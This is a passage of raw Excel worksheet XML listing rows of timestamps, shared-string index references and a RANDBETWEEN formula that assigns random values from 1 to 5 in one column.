      </c>
      <c r="F13387">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13388" s="1">
        <v>43272.314953703702</v>
      </c>
      <c r="C13388" t="s">
        <v>69</v>
      </c>
      <c r="E13388" t="s">
        <v>12001</v>
      </c>
      <c r="F13388">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13389" s="1">
        <v>43272.22079861111</v>
      </c>
      <c r="C13389" t="s">
        <v>80</v>
      </c>
      <c r="E13389">
        <v>9979634805</v>
      </c>
      <c r="F13389">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13390" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13390" s="1">
        <v>43272.17728009259</v>
      </c>
      <c r="C13390" t="s">
        <v>43</v>
      </c>
      <c r="D13390" t="s">
        <v>750</v>
      </c>
      <c r="E13390" s="2" t="s">
        <v>12002</v>
      </c>
      <c r="F13390">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13391" s="1">
        <v>43272.155775462961</v>
      </c>
      <c r="C13391" t="s">
        <v>65</v>
      </c>
      <c r="E13391" t="s">
        <v>12003</v>
      </c>
      <c r="F13391">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13392" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13392" s="1">
        <v>43272.152662037035</v>
      </c>
      <c r="C13392" t="s">
        <v>65</v>
      </c>
      <c r="E13392" s="2" t="s">
        <v>12004</v>
      </c>
      <c r="F13392">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13393" s="1">
        <v>43272.152060185188</v>
      </c>
      <c r="C13393" t="s">
        <v>48</v>
      </c>
      <c r="E13393" t="s">
        <v>12005</v>
      </c>
      <c r="F13393">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13394" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13394" s="1">
        <v>43272.110613425924</v>
      </c>
      <c r="C13394" t="s">
        <v>118</v>
      </c>
      <c r="D13394" t="s">
        <v>480</v>
      </c>
      <c r="E13394" s="2" t="s">
        <v>12006</v>
      </c>
      <c r="F13394">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13395" s="1">
        <v>43272.099131944444</v>
      </c>
      <c r="C13395" t="s">
        <v>41</v>
      </c>
      <c r="F13395">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13396" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13396" s="1">
        <v>43272.031435185185</v>
      </c>
      <c r="C13396" t="s">
        <v>140</v>
      </c>
      <c r="D13396" t="s">
        <v>312</v>
      </c>
      <c r="E13396" s="2" t="s">
        <v>12007</v>
      </c>
      <c r="F13396">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13397" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A13397" s="1">
        <v>43272.01666666667</v>
      </c>
      <c r="C13397" t="s">
        <v>118</v>
      </c>
      <c r="D13397" t="s">
        <v>494</v>
      </c>
      <c r="E13397" s="2" t="s">
        <v>12008</v>
      </c>
      <c r="F13397">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13398" s="1">
        <v>43271.955428240741</v>
      </c>
      <c r="C13398" t="s">
        <v>41</v>
      </c>
      <c r="F13398">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13399" s="1">
        <v>43271.955416666664</v>
      </c>
      <c r="C13399" t="s">
        <v>41</v>
      </c>
      <c r="F13399">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13400" s="1">
        <v>43271.940405092595</v>
      </c>
      <c r="C13400" t="s">
        <v>314</v>
      </c>
      <c r="E13400" t="s">
        <v>12009</v>
      </c>
      <c r="F13400">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13401" s="1">
        <v>43271.933055555557</v>
      </c>
      <c r="C13401" t="s">
        <v>10</v>
      </c>
      <c r="D13401" t="s">
        <v>89</v>
      </c>
      <c r="E13401" t="s">
        <v>12010</v>
      </c>
      <c r="F13401">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13402" s="1">
        <v>43271.927314814813</v>
      </c>
      <c r="C13402" t="s">
        <v>5162</v>
      </c>
      <c r="D13402" t="s">
        <v>36</v>
      </c>
      <c r="E13402" t="s">
        <v>12011</v>
      </c>
      <c r="F13402">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13403" s="1">
        <v>43271.915937500002</v>
      </c>
      <c r="C13403" t="s">
        <v>10</v>
      </c>
      <c r="D13403" t="s">
        <v>36</v>
      </c>
      <c r="E13403" t="s">
        <v>12012</v>
      </c>
      <c r="F13403">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13404" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13404" s="1">
        <v>43271.913124999999</v>
      </c>
      <c r="C13404" t="s">
        <v>140</v>
      </c>
      <c r="D13404" t="s">
        <v>141</v>
      </c>
      <c r="E13404" s="2" t="s">
        <v>12013</v>
      </c>
      <c r="F13404">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13405" s="1">
        <v>43271.910601851851</v>
      </c>
      <c r="C13405" t="s">
        <v>10</v>
      </c>
      <c r="D13405" t="s">
        <v>36</v>
      </c>
      <c r="E13405" t="s">
        <v>12014</v>
      </c>
      <c r="F13405">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13406" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13406" s="1">
        <v>43271.760405092595</v>
      </c>
      <c r="C13406" t="s">
        <v>6</v>
      </c>
      <c r="E13406" s="2" t="s">
        <v>12015</v>
      </c>
      <c r="F13406">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13407" s="1">
        <v>43271.733067129629</v>
      </c>
      <c r="C13407" t="s">
        <v>10</v>
      </c>
      <c r="D13407" t="s">
        <v>6</v>
      </c>
      <c r="F13407">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13408" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13408" s="1">
        <v>43271.716504629629</v>
      </c>
      <c r="C13408" t="s">
        <v>10</v>
      </c>
      <c r="D13408" t="s">
        <v>251</v>
      </c>
      <c r="E13408" s="2" t="s">
        <v>12016</v>
      </c>
      <c r="F13408">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13409" s="1">
        <v>43271.709722222222</v>
      </c>
      <c r="C13409" t="s">
        <v>260</v>
      </c>
      <c r="E13409" t="s">
        <v>12017</v>
      </c>
      <c r="F13409">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13410" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13410" s="1">
        <v>43271.698831018519</v>
      </c>
      <c r="C13410" t="s">
        <v>6</v>
      </c>
      <c r="D13410" t="s">
        <v>67</v>
      </c>
      <c r="E13410" s="2" t="s">
        <v>12018</v>
      </c>
      <c r="F13410">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13411" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13411" s="1">
        <v>43271.6640625</v>
      </c>
      <c r="C13411" t="s">
        <v>10</v>
      </c>
      <c r="D13411" t="s">
        <v>89</v>
      </c>
      <c r="E13411" s="2" t="s">
        <v>12019</v>
      </c>
      <c r="F13411">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13412" s="1">
        <v>43271.65048611111</v>
      </c>
      <c r="C13412" t="s">
        <v>623</v>
      </c>
      <c r="D13412" t="s">
        <v>312</v>
      </c>
      <c r="E13412" t="s">
        <v>12020</v>
      </c>
      <c r="F13412">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13413" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13413" s="1">
        <v>43271.603449074071</v>
      </c>
      <c r="C13413" t="s">
        <v>10</v>
      </c>
      <c r="D13413" t="s">
        <v>232</v>
      </c>
      <c r="E13413" s="2" t="s">
        <v>12021</v>
      </c>
      <c r="F13413">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13414" s="1">
        <v>43271.566874999997</v>
      </c>
      <c r="C13414" t="s">
        <v>6</v>
      </c>
      <c r="D13414" t="s">
        <v>114</v>
      </c>
      <c r="E13414" t="s">
        <v>12022</v>
      </c>
      <c r="F13414">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13415" s="1">
        <v>43271.559664351851</v>
      </c>
      <c r="C13415" t="s">
        <v>60</v>
      </c>
      <c r="E13415" t="s">
        <v>12023</v>
      </c>
      <c r="F13415">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13416" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A13416" s="1">
        <v>43271.557754629626</v>
      </c>
      <c r="C13416" t="s">
        <v>17</v>
      </c>
      <c r="D13416" t="s">
        <v>667</v>
      </c>
      <c r="E13416" s="2" t="s">
        <v>12024</v>
      </c>
      <c r="F13416">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13417" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13417" s="1">
        <v>43271.54828703704</v>
      </c>
      <c r="C13417" t="s">
        <v>10</v>
      </c>
      <c r="D13417" t="s">
        <v>112</v>
      </c>
      <c r="E13417" s="2" t="s">
        <v>12025</v>
      </c>
      <c r="F13417">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13418" s="1">
        <v>43271.542581018519</v>
      </c>
      <c r="C13418" t="s">
        <v>67</v>
      </c>
      <c r="D13418" t="s">
        <v>14</v>
      </c>
      <c r="E13418" t="s">
        <v>11984</v>
      </c>
      <c r="F13418">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13419" s="1">
        <v>43271.541006944448</v>
      </c>
      <c r="C13419" t="s">
        <v>10</v>
      </c>
      <c r="D13419" t="s">
        <v>178</v>
      </c>
      <c r="E13419" t="s">
        <v>12026</v>
      </c>
      <c r="F13419">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13420" s="1">
        <v>43271.524699074071</v>
      </c>
      <c r="C13420" t="s">
        <v>10</v>
      </c>
      <c r="D13420" t="s">
        <v>36</v>
      </c>
      <c r="E13420" t="s">
        <v>12027</v>
      </c>
      <c r="F13420">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13421" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A13421" s="1">
        <v>43271.507152777776</v>
      </c>
      <c r="C13421" t="s">
        <v>10</v>
      </c>
      <c r="D13421" t="s">
        <v>33</v>
      </c>
      <c r="E13421" s="2" t="s">
        <v>12028</v>
      </c>
      <c r="F13421">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13422" s="1">
        <v>43271.497442129628</v>
      </c>
      <c r="C13422" t="s">
        <v>10</v>
      </c>
      <c r="D13422" t="s">
        <v>20</v>
      </c>
      <c r="E13422" t="s">
        <v>12029</v>
      </c>
      <c r="F13422">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13423" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13423" s="1">
        <v>43271.49287037037</v>
      </c>
      <c r="C13423" t="s">
        <v>623</v>
      </c>
      <c r="E13423" s="2" t="s">
        <v>12030</v>
      </c>
      <c r="F13423">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13424" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13424" s="1">
        <v>43271.48877314815</v>
      </c>
      <c r="C13424" t="s">
        <v>10</v>
      </c>
      <c r="D13424" t="s">
        <v>1056</v>
      </c>
      <c r="E13424" s="2" t="s">
        <v>12031</v>
      </c>
      <c r="F13424">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13425" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13425" s="1">
        <v>43271.483020833337</v>
      </c>
      <c r="C13425" t="s">
        <v>6</v>
      </c>
      <c r="D13425" t="s">
        <v>194</v>
      </c>
      <c r="E13425" s="2" t="s">
        <v>12032</v>
      </c>
      <c r="F13425">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13426" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13426" s="1">
        <v>43271.477534722224</v>
      </c>
      <c r="C13426" t="s">
        <v>48</v>
      </c>
      <c r="E13426" t="s">
        <v>12033</v>
      </c>
      <c r="F13426">
        <f t="shared" ca="1" si="209"/>
        <v>3</v>
      </c>
    </row>
    <row r="13427" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13427" s="1">
        <v>43271.473368055558</v>
      </c>
      <c r="C13427" t="s">
        <v>10</v>
      </c>
      <c r="D13427" t="s">
        <v>89</v>
      </c>
      <c r="E13427" t="s">
        <v>12034</v>
      </c>
      <c r="F13427">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13428" s="1">
        <v>43271.385625000003</v>
      </c>
      <c r="C13428" t="s">
        <v>10</v>
      </c>
      <c r="D13428" t="s">
        <v>494</v>
      </c>
      <c r="E13428" t="s">
        <v>12035</v>
      </c>
      <c r="F13428">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13429" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13429" s="1">
        <v>43271.370393518519</v>
      </c>
      <c r="C13429" t="s">
        <v>10</v>
      </c>
      <c r="D13429" t="s">
        <v>86</v>
      </c>
      <c r="E13429" t="s">
        <v>12036</v>
      </c>
      <c r="F13429">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13430" s="1">
        <v>43271.36645833333</v>
      </c>
      <c r="C13430" t="s">
        <v>48</v>
      </c>
      <c r="E13430" t="s">
        <v>12037</v>
      </c>
      <c r="F13430">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13431" s="1">
        <v>43271.350104166668</v>
      </c>
      <c r="C13431" t="s">
        <v>140</v>
      </c>
      <c r="D13431" t="s">
        <v>141</v>
      </c>
      <c r="E13431" t="s">
        <v>12038</v>
      </c>
      <c r="F13431">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13432" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13432" s="1">
        <v>43271.325937499998</v>
      </c>
      <c r="C13432" t="s">
        <v>48</v>
      </c>
      <c r="E13432" s="2" t="s">
        <v>12039</v>
      </c>
      <c r="F13432">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13433" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13433" s="1">
        <v>43271.321319444447</v>
      </c>
      <c r="C13433" t="s">
        <v>430</v>
      </c>
      <c r="E13433" s="2" t="s">
        <v>12040</v>
      </c>
      <c r="F13433">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13434" s="1">
        <v>43271.319201388891</v>
      </c>
      <c r="C13434" t="s">
        <v>10</v>
      </c>
      <c r="D13434" t="s">
        <v>20</v>
      </c>
      <c r="E13434" t="s">
        <v>12041</v>
      </c>
      <c r="F13434">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13435" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13435" s="1">
        <v>43271.221458333333</v>
      </c>
      <c r="C13435" t="s">
        <v>41</v>
      </c>
      <c r="E13435" s="2" t="s">
        <v>12042</v>
      </c>
      <c r="F13435">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13436" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A13436" s="1">
        <v>43271.207708333335</v>
      </c>
      <c r="C13436" t="s">
        <v>71</v>
      </c>
      <c r="E13436" s="2" t="s">
        <v>12043</v>
      </c>
      <c r="F13436">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13437" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A13437" s="1">
        <v>43271.205185185187</v>
      </c>
      <c r="C13437" t="s">
        <v>118</v>
      </c>
      <c r="D13437" t="s">
        <v>36</v>
      </c>
      <c r="E13437" s="2" t="s">
        <v>12044</v>
      </c>
      <c r="F13437">
        <f t="shared" ca="1" si="209"/>
        <v>4</v>
      </c>
    </row>
    <row r="13438" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13438" s="1">
        <v>43271.192800925928</v>
      </c>
      <c r="C13438" t="s">
        <v>50</v>
      </c>
      <c r="E13438" s="2" t="s">
        <v>12045</v>
      </c>
      <c r="F13438">
        <f t="shared" ca="1" si="209"/>
        <v>1</v>
      </c>
    </row>
    <row r="13439" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13439" s="1">
        <v>43271.176979166667</v>
      </c>
      <c r="C13439" t="s">
        <v>43</v>
      </c>
      <c r="E13439" s="2" t="s">
        <v>12046</v>
      </c>
      <c r="F13439">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13440" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13440" s="1">
        <v>43271.148321759261</v>
      </c>
      <c r="C13440" t="s">
        <v>319</v>
      </c>
      <c r="D13440" t="s">
        <v>320</v>
      </c>
      <c r="E13440" s="2" t="s">
        <v>12047</v>
      </c>
      <c r="F13440">
        <f t="shared" ca="1" si="209"/>
        <v>5</v>
      </c>
    </row>
    <row r="13441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13441" s="1">
        <v>43271.118090277778</v>
      </c>
      <c r="C13441" t="s">
        <v>41</v>
      </c>
      <c r="E13441" t="s">
        <v>12048</v>
      </c>
      <c r="F13441">
        <f t="shared" ca="1" si="209"/>
        <v>2</v>
      </c>
    </row>
    <row r="13442" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A13442" s="1">
        <v>43271.079756944448</v>
      </c>
      <c r="C13442" t="s">
        <v>10</v>
      </c>
      <c r="E13442" s="2" t="s">
        <v>12049</v>
      </c>
      <c r="F13442">
        <f t="shared" ref="F13442:F13505" ca="1" si="210">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="13443" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13443" s="1">
        <v>43271.062326388892</v>
      </c>
      <c r="C13443" t="s">
        <v>586</v>
      </c>
      <c r="E13443" s="2" t="s">
        <v>12050</v>
      </c>
      <c r="F13443">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13444" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13444" s="1">
        <v>43270.922835648147</v>
      </c>
      <c r="C13444" t="s">
        <v>10</v>
      </c>
      <c r="D13444" t="s">
        <v>271</v>
      </c>
      <c r="E13444" s="2" t="s">
        <v>12051</v>
      </c>
      <c r="F13444">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13445" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13445" s="1">
        <v>43270.892094907409</v>
      </c>
      <c r="C13445" t="s">
        <v>6</v>
      </c>
      <c r="D13445" t="s">
        <v>25</v>
      </c>
      <c r="E13445" s="2" t="s">
        <v>12052</v>
      </c>
      <c r="F13445">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13446" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13446" s="1">
        <v>43270.868703703702</v>
      </c>
      <c r="C13446" t="s">
        <v>6431</v>
      </c>
      <c r="D13446" t="s">
        <v>290</v>
      </c>
      <c r="E13446" s="2" t="s">
        <v>12053</v>
      </c>
      <c r="F13446">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13447" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13447" s="1">
        <v>43270.845393518517</v>
      </c>
      <c r="C13447" t="s">
        <v>8588</v>
      </c>
      <c r="D13447" t="s">
        <v>232</v>
      </c>
      <c r="E13447" s="2" t="s">
        <v>12054</v>
      </c>
      <c r="F13447">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13448" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13448" s="1">
        <v>43270.796435185184</v>
      </c>
      <c r="C13448" t="s">
        <v>6</v>
      </c>
      <c r="D13448" t="s">
        <v>25</v>
      </c>
      <c r="E13448" s="2" t="s">
        <v>12055</v>
      </c>
      <c r="F13448">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13449" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13449" s="1">
        <v>43270.791250000002</v>
      </c>
      <c r="C13449" t="s">
        <v>5634</v>
      </c>
      <c r="D13449" t="s">
        <v>107</v>
      </c>
      <c r="E13449" s="2" t="s">
        <v>12056</v>
      </c>
      <c r="F13449">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13450" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13450" s="1">
        <v>43270.780462962961</v>
      </c>
      <c r="C13450" t="s">
        <v>16</v>
      </c>
      <c r="E13450" s="2" t="s">
        <v>12057</v>
      </c>
      <c r="F13450">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13451" s="1">
        <v>43270.706793981481</v>
      </c>
      <c r="C13451" t="s">
        <v>10</v>
      </c>
      <c r="D13451" t="s">
        <v>17</v>
      </c>
      <c r="E13451" t="s">
        <v>12058</v>
      </c>
      <c r="F13451">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13452" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13452" s="1">
        <v>43270.699479166666</v>
      </c>
      <c r="C13452" t="s">
        <v>10</v>
      </c>
      <c r="D13452" t="s">
        <v>52</v>
      </c>
      <c r="E13452" t="s">
        <v>12059</v>
      </c>
      <c r="F13452">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13453" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13453" s="1">
        <v>43270.696956018517</v>
      </c>
      <c r="C13453" t="s">
        <v>10</v>
      </c>
      <c r="D13453" t="s">
        <v>89</v>
      </c>
      <c r="E13453" t="s">
        <v>12060</v>
      </c>
      <c r="F13453">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13454" s="1">
        <v>43270.664155092592</v>
      </c>
      <c r="C13454" t="s">
        <v>10</v>
      </c>
      <c r="D13454" t="s">
        <v>20</v>
      </c>
      <c r="E13454" t="s">
        <v>12061</v>
      </c>
      <c r="F13454">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13455" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13455" s="1">
        <v>43270.664155092592</v>
      </c>
      <c r="C13455" t="s">
        <v>10</v>
      </c>
      <c r="D13455" t="s">
        <v>20</v>
      </c>
      <c r="E13455" t="s">
        <v>12061</v>
      </c>
      <c r="F13455">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13456" s="1">
        <v>43270.65384259259</v>
      </c>
      <c r="C13456" t="s">
        <v>10</v>
      </c>
      <c r="D13456" t="s">
        <v>36</v>
      </c>
      <c r="E13456" t="s">
        <v>12062</v>
      </c>
      <c r="F13456">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13457" s="1">
        <v>43270.645532407405</v>
      </c>
      <c r="C13457" t="s">
        <v>10</v>
      </c>
      <c r="D13457" t="s">
        <v>89</v>
      </c>
      <c r="E13457" t="s">
        <v>12063</v>
      </c>
      <c r="F13457">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13458" s="1">
        <v>43270.634780092594</v>
      </c>
      <c r="C13458" t="s">
        <v>10</v>
      </c>
      <c r="D13458" t="s">
        <v>17</v>
      </c>
      <c r="E13458" t="s">
        <v>12064</v>
      </c>
      <c r="F13458">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13459" s="1">
        <v>43270.626631944448</v>
      </c>
      <c r="C13459" t="s">
        <v>10</v>
      </c>
      <c r="D13459" t="s">
        <v>192</v>
      </c>
      <c r="E13459" t="s">
        <v>12065</v>
      </c>
      <c r="F13459">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13460" s="1">
        <v>43270.621944444443</v>
      </c>
      <c r="C13460" t="s">
        <v>10</v>
      </c>
      <c r="D13460" t="s">
        <v>89</v>
      </c>
      <c r="E13460" t="s">
        <v>12066</v>
      </c>
      <c r="F13460">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13461" s="1">
        <v>43270.616006944445</v>
      </c>
      <c r="C13461" t="s">
        <v>10</v>
      </c>
      <c r="D13461" t="s">
        <v>52</v>
      </c>
      <c r="E13461" t="s">
        <v>12067</v>
      </c>
      <c r="F13461">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13462" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13462" s="1">
        <v>43270.597743055558</v>
      </c>
      <c r="C13462" t="s">
        <v>60</v>
      </c>
      <c r="E13462" s="2" t="s">
        <v>12068</v>
      </c>
      <c r="F13462">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13463" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13463" s="1">
        <v>43270.583993055552</v>
      </c>
      <c r="C13463" t="s">
        <v>6</v>
      </c>
      <c r="D13463" t="s">
        <v>82</v>
      </c>
      <c r="E13463" s="2" t="s">
        <v>12069</v>
      </c>
      <c r="F13463">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13464" s="1">
        <v>43270.574629629627</v>
      </c>
      <c r="C13464" t="s">
        <v>10</v>
      </c>
      <c r="D13464" t="s">
        <v>11</v>
      </c>
      <c r="E13464" t="s">
        <v>12070</v>
      </c>
      <c r="F13464">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13465" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13465" s="1">
        <v>43270.567962962959</v>
      </c>
      <c r="C13465" t="s">
        <v>10</v>
      </c>
      <c r="D13465" t="s">
